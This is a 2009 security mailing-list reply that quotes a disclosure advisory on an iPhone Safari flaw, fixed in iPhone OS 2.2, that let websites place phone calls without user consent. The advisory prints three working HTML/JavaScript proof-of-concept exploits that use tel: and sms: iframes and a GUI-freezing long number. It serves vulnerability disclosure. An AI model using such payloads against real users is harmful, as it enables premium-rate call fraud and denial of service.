[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <4A39F3D1.4040802@betaversion.net>
Date: Thu, 18 Jun 2009 09:14:57 -0700
From: Mike Ely <me@...pehat.com>
To: Collin Mulliner <collin@...aversion.net>, bugtraq@...urityfocus.com,
full-disclosure@...ts.grok.org.uk
Subject: Re: iPhone Safari phone-auto-dial vulnerability
(original date: Nov. 2008)
Confirmed on the T-Mobile G1 email app running OS version 1.5. Was wondering why my phone stepped on email to dial out when I read this email and then I read the subject line ;)
FWIW, it didn't actually dial, just loaded the dialer with that number ready.
Looks like this is a Webkit bug, not Safari.
Collin Mulliner <collin@...aversion.net> wrote:
>Released since Apple published the iPhone 3.0 security fixes.
>
>Vulnerability Report
>
>--- BEGIN ADVISORY ---
>
>Manufacturer: Apple (www.apple.com)
>Device: iPhone 3G (iPhone 1st Gen)
>Firmware: 2.1 (possible earlier versions)
>Device Type: smart phone
>
>Subsystems: Safari (and mobile telephony)
>
>-----------------------------
>
>Short name:
> iPhone Safari phone-auto-dial (vulnerability)
>
>Vulnerability class:
> application logic bug
>
>Executive Summary:
> A malicious website can initiate a phone call without the need of user
> interaction. The destination phone number is chosen by the attacker.
>
>Risk: MEDIUM-HIGH
> Medium to high risk due to the possibility of financial gain through
> this attack by calling of premium rate numbers (e.g. 1-900 in the
> U.S.). Denial-of-service against arbitrary phone numbers through
> mass-calling. User cannot prevent attack.
>
>-----------------------------
>
>Reporter: Collin Mulliner <collin[AT]mulliner.org>
>
>-----------------------------
>
>Affiliation: MUlliNER.ORG / the trifinite group / (Fraunhofer SIT)
>
>-----------------------------
>
>Time line:
>
> Oct. 20. 2008: Reported vulnerability to vendor.
> Oct. 20. 2008: Vendor acknowledges receiving our email.
> Not commenting on the vulnerability itself.
> Oct. 27. 2008: Sent update to vendor, also requesting a status report.
> Oct. 29. 2008: Reply from vendor acknowledging the vulnerability.
> Oct. 30. 2008: Sent additional information.
> Nov. 13. 2008: Vender says vulnerability is fixed in upcoming OS
> version.
> Nov. 20. 2008: Public disclosure.
> Jun. 18. 2009: Full-Disclosure.
>
>-----------------------------
>
>Fix:
>
> iPhone OS 2.2
> iPhone OS 2.2.1
> iPhone OS 3.0
>
>-----------------------------
>
>Technical Details:
>
> The Safari version running on the iPhone supports handling the TEL [1]
> protocol through launching the telephony/dialer application. This is
> done by passing the provided phone number to the telephony
> application. Under normal conditions, loading a tel: URI results in a
> message box asking the user's permission to call the given number. The
> user is presented with the simple choice to either press call or
> cancel.
>
> A TEL URI can be opened automatically if the TEL URI is used as the
> source of an HTML iframe or frame, as the URL of a meta refresh, as
> the location of a HTTP 30X redirect, and as the location of the
> current or a new window using javascript.
>
> We discovered a security vulnerability that dismisses the "ask for
> permission to call" dialog in a way that chooses the "call" option
> rather than the "cancel" option.
>
> This condition occurs if a TEL URI is activated at the same time
> Safari is closed by launching an external application, for example
> launching the SMS application (in order to handle a SMS URI [2]). The
> SMS application can be launched through placing a SMS URI as the
> source of an iframe. This is shown in the first proof-of-concept
> exploit below.
>
> Further investigation showed that this behavior can be reproduced by
> launching other applications such as: Maps, YouTube, and iTunes.
> Launching these applications can be achieved through loading special
> URLs using the meta refresh tag. This is shown in the second
> proof-of-concept exploit below.
>
> We also discovered that the bug can also be triggered through popup
> windows (e.g. javascript alert). In this situation the initiating app
> does not need to be termianted in order to active the call.
>
> Finally, we discovered a second bug that can be used to perform
> malicious phone calls that cannot be prevented or canceled by the
> victim. This bug allows the attacker to freez the GUI (graphical user
> interface) for a number of seconds. While the GUI is frozen the call
> progresses in the background and cannot be stopped by the victim user.
> Freezing the GUI is achieved by passing a "very long" phone number to
> the SMS application. The SMS application, immediately after being
> started, freezes the iPhone GUI. Also switching off the iPhone cannot
> be performed fast enough in order to prevent the malicious call.
>
>
> [1] http://www.rfc-editor.org/rfc/rfc3966.txt
> [2] http://tools.ietf.org/html/draft-antti-gsm-sms-url-04
>
>-----------------------------
>
>Further Discussion:
>
> The dialing dialog is clearly shown to the user also the user, in most
> cases, can't press cancel quick enough in order to stop the initiation
> of the call. Once the external application is launched, the telephony
> application is running in the background performing the call. Only
> the call forwarding dialog (containing the "dismiss" button) indicates
> a call being made.
>
>-----------------------------
>
>Proof-of-Concept with plain HTML using the SMS application:
>
> <html>
> <head>
> <title>iPhone Safari phone-auto-dial Exploit Demo by Collin Mulliner
> </title>
> </head>
> <body>
> <iframe src="sms:+14089748388" WIDTH=50 HEIGHT=10></iframe>
> <iframe src="tel:+14089748388" WIDTH=50 HEIGHT=10></iframe>
> <!-- second iframe is to attack quick users who manage to close the
> first call-dialog //-->
> <iframe src="tel:+14089748388" WIDTH=50 HEIGHT=10></iframe>
> </body>
> </html>
>
>Proof-of-Concept using javascript and the Maps application:
>
> <html>
> <head>
> <title>iPhone Safari phone-auto-dial Exploit Demo by Collin Mulliner
> </title>
> <meta http-equiv="refresh" content="0;
> URL=http://maps.google.de/maps?q=rheinstrasse+75+darmstadt">
> </head>
> <body>
> <script lang=javascript>
> function a() {
> document.write("<iframe src=\"tel:+14089748388\" WIDTH=50
>HEIGHT=10></iframe>");
> }
> setTimeout("a()", 100);
> </script>
> </body>
> </html>
>
>Proof-of-Concept attack where the victim user cannot stop the malicious
>phone call:
>
> <html>
> <head>
> <title>iPhone Safari phone-auto-dial Exploit Demo by Collin Mulliner
> </title>
> </head>
> <body>
> <script lang=javascript>
> l = "<iframe src=\"sms:";
> for (i = 0; i < 10000; i++) {
> l = l + "3340948034298232";
> }
> l = l + "\" width=10 height=10></iframe><iframe
> src=\"tel:+14089748388\" height=10 width=10></iframe>";
> document.write(l);
> </script>
> </body>
> </html>
>
>-----------------------------
>
>More Detailed Information:
>
> Demo video available at:
> http://www.mulliner.org/iphone/
>
> Advisories:
> http://www.mulliner.org/security/advisories/
>
>--- END ADVISORY ---
>
>
>--
>Collin R. Mulliner <collin@...aversion.net>
>info/pgp: finger collin@...aversion.net
>If Bill Gates had a nickel for every time Windows crashed... Oh wait, he
>does!
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists